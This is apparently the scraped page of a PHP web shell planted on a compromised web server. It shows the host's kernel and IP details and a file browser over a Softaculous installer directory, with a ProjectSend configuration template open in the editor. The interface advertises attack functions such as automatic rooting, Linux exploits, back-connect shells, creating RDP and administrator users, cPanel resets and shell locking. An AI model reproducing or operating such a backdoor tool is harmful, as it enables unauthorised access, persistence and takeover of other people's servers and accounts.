Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.130.182
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
cftp /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
6.16
KB
-rw-r--r--
clone.php
2.53
KB
-rw-r--r--
edit.php
4.41
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
8.8
KB
-rw-r--r--
fileindex.php
940
B
-rw-r--r--
import.php
3.5
KB
-rw-r--r--
info.xml
3.08
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.78
KB
-rw-r--r--
install.xml
1012
B
-rw-r--r--
md5
2.07
KB
-rw-r--r--
notes.txt
306
B
-rw-r--r--
sys.config.php
2.53
KB
-rw-r--r--
update_pass.php
517
B
-rw-r--r--
upgrade.php
3.35
KB
-rw-r--r--
upgrade.xml
263
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sys.config.php
<?php /** * ProjectSend personal configuration file * * This file contains the database connection information, the language * definition, the maximum allowed filesize for uploads and the encoding * that will be used on the sent e-mails (for new client, new user and * new file). * * It must be renamed to sys.config.php for ProjectSend to recognize * it, and the database information must be completed before installing * the software. * The filesize value and the character encoding can be changed at anytime. * * When downloading a new ProjectSend version, this file will not be * overwritten, as the version included by default is named * sys.config.sample.php * * @package ProjectSend * */ /** * Enter your database connection information here * If you have doubts about this values, consult your web hosting provider. */ /** * Database driver to use with PDO. * Possible options: mysql, mssql */ define('DB_DRIVER', 'mysql'); /** Database name */ define('DB_NAME', '[[softdb]]'); /** Database host (in most cases it's localhost) */ define('DB_HOST', '[[softdbhost]]'); /** Database username (must be assigned to the database) */ define('DB_USER', '[[softdbuser]]'); /** Database password */ define('DB_PASSWORD', '[[softdbpass]]'); /** * Prefix for the tables. Set to something other than tbl_ for increased * security onr in case you want more than 1 installations on the same database. */ define('TABLES_PREFIX', 'tbl_'); /* * Global site language definition * * For this setting to work on the back-end (log-in, administration, * and the installation pages, and the e-mails sent by the system), a file named * x.mo (where x is the value that you define here) must exist on the folder * /lang. * * The uploader language strings are loaded from the file x.mo (see above) that * is located on the folder /includes/plupload/js/i18n/ * * If you want to apply this setting to the client's file lists, you must * have a file named x.mo (see above) on your selected template folder * (eg: /templates/default/lang). * * English language files are included by default. * * This setting can be changed at anytime and the language will be applied * immediately. * */ define('SITE_LANG','en'); /** * Define a maximum size (in mb.) that is allowed on each file to be uploaded. */ define('MAX_FILESIZE','2048'); /** * Encoding to use on the e-mails sent to new clients, users, files, etc. */ define('EMAIL_ENCODING', 'utf-8'); /** * DEBUG constant effects: * - Changes the error_reporting php value */ define('DEBUG', false);
Close